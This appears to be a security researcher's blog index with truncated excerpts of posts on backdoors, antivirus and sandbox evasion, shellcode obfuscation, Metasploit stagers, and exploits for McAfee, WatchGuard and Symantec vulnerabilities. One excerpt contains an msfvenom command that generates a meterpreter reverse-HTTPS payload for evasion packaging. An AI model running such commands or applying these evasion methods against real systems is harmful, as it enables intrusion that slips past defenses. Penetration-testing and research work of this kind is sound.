Reverse SSL backdoor with socat and metasploit (and proxies)
1. Introduction This is a short article explaining how to quickly create a reverse backdoor for Windows or Linux (this article will focus on Windows) using encrypted communication inside an SSL tunnel...
cD00r Knocking backdoor (improved)
1. Introduction Standard backdoors and remote access services have one major drawback: the ports they are listening on are visible on the system console as well as from outside (through port...
100% Anti-Virus evasion with Metasploit browser exploits (example with ms11-003)
1. Introduction If Metasploit encoders are great tools to avoid Anti-virus detection of the Payload (meterpreter, reverse_tcp, …), it is not always so easy to avoid the “Exploit” detection. No. This...
Simple shellcode obfuscation
1. Introduction This article aims to provide you with the different steps needed to develop shellcode obfuscation techniques, and their respective deobfuscator assembly stubs. This should help you to...
Antivirus Sandbox Evasion (part1) – Preview
Hmmm, it seems that I wrote something very nice .. $ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \ | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o...
Antivirus Sandbox Evasion (part2) – Slides
Hello, Here is the PowerPoint presentation explaining the sandbox evasion technique used in part 1 of this story (see Antivirus Sandbox Evasion (part1)). Enjoy. Note: There is a rating embedded...
psk-crack (ike-scan) CUDA add-on
UPDATE: Things are moving well on Hashcat.net! https://hashcat.net/trac/ticket/5 Hello, If you are familiar with ike-scan and you hold NVidia card(s), you could be interested in cracking Pre-Shared...
Antivirus Sandbox Evasion (part3) – The Tool
Ok, here we are. Thank you for your patience. It is time to release version 0.1 of the “tool”. The archive is composed of: an EXE template (ultimate-payload-template1.exe) which manages the...
Metasploit plugin: notify_mail.rb (email notification)
1. Introduction Here is a Metasploit plug-in which allows you to get e-mail notifications when new sessions open. The usage of this plug-in makes sense during Social Engineering attacks, or during...
Metasploit stager: reverse_https with basic authentication against proxy
1. Introduction While reverse_https does an amazing job of supporting proxy servers and NTLM authentication, there are some situations where the proxy server only handles basic authentication, and where you...
Exploit: McAfee ePolicy 0wner (ePowner) – Preview
If you heard about the following vulnerabilities in McAfee ePolicy Orchestrator version 4.6.5 and earlier: CVE-2013-0140 – Pre-authenticated SQL injection CVE-2013-0141 – Pre-authenticated directory...
Cracking WatchGuard passwords
Watchguard Firewall appliances offer the ability to manage policies per user. Several mechanisms can be used to authenticate users (Active Directory, LDAP, Radius, ..) including a local database called...
WatchGuard – CVE-2013-6021 – Stack Based Buffer Overflow Exploit
1. Introduction This blog entry aims to provide the reader with technical details about the stack-based buffer overflow that we’ve discovered in the web administration console of the WatchGuard XTM...
Turning your Antivirus into my botnet – OWASP Benelux 2013 – Slides
Below are the slides that I’ve presented at the OWASP Benelux day 2013 (Amsterdam). It covers partial results of my research about Managed Antivirus software, especially how I’ve chained multiple...
Symantec Endpoint Protection Manager – CVE-2013-1612 – Remote Buffer Overflow...
Hello, Do you want to help me turn this PoC into reliable exploit code? Here is the short story about CVE-2013-1612, a remote buffer overflow that I’ve reported to Symantec in June 2013. The...
Exploit: McAfee ePolicy 0wner (ePowner) v0.1 – Release
UPDATE: Version 0.2 released on 29th of June 2014. Check out https://github.com/funoverip/epowner. Hi, I received so many requests for this exploit code. Usually my response was something similar to:...
GNU Radio – CC1111 packets encoder/decoder blocks
Introduction I recently worked with RF transmissions between CC1111-based devices (the chips that are supported by RFCat) and I was in the need to easily encode and decode my payloads using GNU Radio....
Reverse Engineer a Verisure Wireless Alarm part 1 – Radio Communications
1. Introduction Verisure is a supplier of wireless home alarms and connected services for the home. A Verisure setup can be composed of multiple devices, sensors and/or detectors such as Motion...
Reverse Engineer a Verisure Wireless Alarm part 2 – Firmwares and crypto keys
1. Introduction So we’re back, ready to run through an additional step into our Verisure Wireless alarm journey. This post is the second chapter of my Verisure story where we’ll learn how to extract...
McAfee SiteList.xml password decryption
Recently, a very good friend of mine (@Sn0rkY) pointed me to the story of a pentester who recovered the encrypted passwords from a McAfee SiteList.xml file using Responder (link). Simply clever....